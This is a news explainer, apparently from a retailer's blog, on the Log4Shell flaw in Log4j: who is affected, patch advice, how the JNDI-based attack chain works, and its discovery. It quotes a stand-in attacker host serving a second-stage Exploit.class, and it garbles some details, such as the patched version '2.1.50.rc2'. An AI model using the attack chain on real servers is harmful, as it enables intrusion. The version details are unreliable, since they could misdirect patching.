Log4Shell security vulnerability: Steam, Apple, Minecraft and many more are vulnerable
14-12-2021
Translation: Patrik Stainbrook
Log4Shell is one of the biggest security vulnerabilities of recent years. The affected logging tool, Log4j, is found in virtually every Java application. There’s a risk of data loss. Or worse.
As of December 9, 2021, Log4j is generally considered a threat to all PC, smartphone, game console, and Internet users. The tool contains a vulnerability that would allow malicious hackers to inject arbitrary code into a system. It’s called Remote Code Execution.
Outside of developer circles, Log4j is virtually unknown. And that’s quite reasonable, as the logging component only reads through the backgrounds of Java applications, giving developers information on errors and other processes. But horrifyingly, its program library opens the door to malicious hackers. What’s worse, Log4j is extremely widespread, which is also why a whole load of systems are vulnerable.
Here are just some of the potential victims:
- Apple
- Tencent
- Steam
- Baidu
- CloudFlare
- Amazon
- Tesla
- Minecraft
- VMWare
- WebEx
- …
This list isn’t exhaustive, and it’s only intended to give an idea of how extensive the problem is.
The vulnerability has been christened Log4Shell.
What can users do against Log4Shell? How to protect yourself?
I’m afraid that, for the most part, you’re at the mercy of Log4Shell. Security expert Manuel Atug advises the following measures:
- Backup all your personal data.
- Install any update that’s offered in the coming days.
What can administrators do against Log4Shell?
Administrators have a powerful tool at their disposal. With a small change to their system, they can ban Log4Shell from their servers forever.
It should be fixed by this update. If Log4j is running on version 2.1.50.rc2, then the vulnerability is no longer in the code.
This update was already included in the official Log4Shell repository before its release. It’s called «Responsible Disclosure». Alibaba’s engineers worked with the Apache Software Foundation, agreeing to maintain secrecy until Apache released a fix.
To find out if a vulnerable version of Log4j is running on your system, security firm Huntress Labs has released the log4shell-tester software. This indicates if your system is running log4j in a non-updated version.
What is Log4j?
Log4j is a logging tool. It records system events that can be studied by server operators to troubleshoot or improve performance.
Log4j isn’t a new component, but it is regularly updated. It was invented by coder Ceki Gülcü and published in 2001. The most recent update before the vulnerability was published is dated December 6, 2021. In this update, a fix for the vulnerability was included.
Log4j is open source and can be used by everyone.
It’s written in the Java programming language and is consequently used by Java applications. Java is often used in the development of web applications.
Log4j is so widespread, in fact, that security vendor Malwarebytes says the vulnerability is «everywhere» – even on Mars.
What is Log4Shell?
The vulnerability in Log4j has been given its own name due to its severity. It’s called «Log4Shell». In security circles, the term «shell» suggests that an attacker can use the vulnerability to execute their own code on a computer.
Log4Shell doesn’t just pop up on your smartphone or computer. The vulnerability is present in all applications that use Log4j. Among them many a server, as they run software using Log4j.
After its discovery, Log4Shell received a rating indicating how bad the vulnerability is. It scored a 10 out of 10, and was given the identification number CVE-2021-44228 by Mitre, the international vulnerability management agency
.
In short: a malicious hacker can run arbitrary malicious code through countless servers all over the world. Or middleware components such as Cisco brand network switches, for example.
What’s worse: Log4Shell is extremely easy to exploit.
What is Remote Code Execution?
Remote Code Execution allows you to, well, execute code remotely. An attacker can sit in the Bahamas and execute code on a Swiss computer, even control it. That’s not how it usually works. Even on a Windows or macOS system, you can’t run all the code you want. When a system detects malicious code, it displays an error message and doesn’t execute anything.
Remote Code Execution gets around this. An attacker can do anything to your system. Whether it simply crashes your Minecraft server, or downloads a copy of all customer data from your web store.
In the case of Log4Shell, a simple string of characters is enough to execute foreign code on the servers of gaming distribution platform Steam – without security mechanisms kicking in.
How does Log4Shell work?
Log4Shell works in several steps. This is how the vulnerability managed to survive undetected for over a decade. Log4Shell is only triggered when Log4j receives commands for the «Java Naming and Directory Interface» (JNDI). This malicious code, called a «payload» in technical jargon, looks like this in the case of the following abstract example:
attacker.com is a website controlled by the attacker.
The security company LunaSec describes the Log4Shell process as follows:
- Data from an attacker is transmitted to the server via any protocol.
- The server writes the data to a log created by Log4j. If this data contains the payload and addresses JNDI, then Log4j sends a request to the attacker’s website.
- The attacker’s website response contains the second part of the attack. As an example, LunaSec gives the code http://second-stage.attacker.com/Exploit.class.
- The attacker.com response is executed by the vulnerable process running on the server. That’s actual code injection.
- This injected code opens the door for an attacker to execute more code.
The first phase of the attack gives the attacker shell access, the second phase gives the attack flexibility, does damage or steals data.
Who discovered Log4Shell?
Log4Shell was discovered by Chen Zhaojun, a member of the Alibaba Cloud Security Team. He informed the Log4j developers and published the vulnerability together with them on December 9, 2021. This gave the developers enough time to fix the vulnerability, test the fix, and submit a patch to the Github repository. This allows affected individuals to repair their systems immediately. In technical jargon, this is referred to as «Responsible Disclosure».
Vulnerability in JNDI isn’t new. Back in 2016, hackers Alvaro Muñoz and Oleksandr Mirosh spoke about the vulnerability in JNDI at the Black Hat security conference.
Is Log4Shell being used by malicious hackers?
Yes, over 500 attacks have been reported by unknown people who want to exploit the Log4Shell method just a few hours after its discovery. However, as far as we know, the attacks haven’t been targeted. They don’t have to be, because Log4j is used everywhere. All a malicious hacker’s script needs to do is submit the first part of the attack to arbitrary servers. If there’s a response, then the second phase of the attack is started automatically. If there’s no response or the attempt is blocked, so be it.
We don’t know what kind of payloads have been included in every attack. Security researcher John Hammond mentions «botnets and Bitcoin miners», but also ransomware or Trojans.
What about us?
«Our own developments, including the stores, aren’t affected by Log4Shell. They don’t use Java,» says Martin Wrona, Security Software Engineer at digitec Galaxus.
Nevertheless, our security engineers were busy. Some internal systems that you never come into contact with as an end customer – warehouse systems, for example – are Java-based. As are other parts of the company’s infrastructure. Where there’s Java, there’s Log4j and Log4Shell: «We had a lot of work to do, but currently all systems are patched or mitigated by configuration,» says Martin.
Journalist. Author. Hacker. A storyteller searching for boundaries, secrets and taboos – putting the world to paper. Not because I can but because I can’t not.
